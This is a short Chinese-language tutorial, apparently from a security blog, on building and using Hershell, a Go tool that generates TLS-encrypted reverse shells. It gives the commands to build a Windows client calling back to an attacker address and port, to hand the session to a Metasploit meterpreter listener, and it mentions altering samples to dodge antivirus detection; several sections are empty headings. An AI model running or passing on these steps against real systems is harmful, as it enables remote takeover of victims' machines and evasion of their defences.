Hershell是一款go语言编写的多平台反向shell生成器,使用tls加密流量,并提供证书公钥指纹固定功能,防止流量拦截。
支持的系统如下:
安装Hershell(已安装go环境),使用go get github.com/lesnuages/hershell 即可拉取项目,或者使用git clone 拉取项目到本地也可。下面是工具的一些参数:
一些额外的说明:
实操:
首先生成一个证书:
make depends
以windows为例,生成一个客户端,其他平台同理:
make windows64 LHOST=192.168.0.12 LPORT=1234
然后开启监听,可以使用如下程序监听:
以ncat为例;
在得到shell以后,还可以与msf进行同传,支持msf以下的payload:
首先msf开启监听:
然后hershell进行同传:
[hershell]> meterpreter https 172.16.122.105:8443
msf收到shell
查杀效果如下(已对样本进行处理,避免被杀样本的情况):